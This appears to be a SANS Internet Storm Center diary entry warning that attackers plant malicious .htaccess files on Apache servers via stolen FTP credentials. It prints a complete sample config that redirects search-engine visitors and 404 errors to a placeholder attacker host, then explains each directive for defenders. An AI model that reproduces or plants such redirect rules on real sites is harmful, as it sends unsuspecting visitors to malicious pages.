SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc(情報元のブックマーク数)



In this latest scheme of attacks, attackers are abusing the RewriteEngine feature in Apache web servers. This feature can be activated through the .htaccess access control file. This file is usually located in the top directory of a web server and in incidents that have been detected so far it appears that the file has been put with stolen FTP credentials.
One sample .htaccess file is shown below:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://BAD_SITE/in.html?s=hg [R,L]
Errordocument 404 http://BAD_SITE/in.html?s=hg_err

Such a .htaccess file first enables the RewriteEngine and then defines 6 condition rules, followed by a RewriteRule. The condition rules check the referer header (%{HTTP_REFERER} and compare it with a regexp that follows. As you can see, the attackers are catching most common search engines. For those not familiar with the rewrite rules above: NC means no case (case insensitive), OR is just a logical OR with the next statement. If any condition matched, the RewriteRule statement is executed. In this sample, it redirected the browser to a bad site ([R,L] in the RewriteRule means force redirect, last rule).

InfoSec Handlers Diary Blog - Watch that .htaccess file on your web site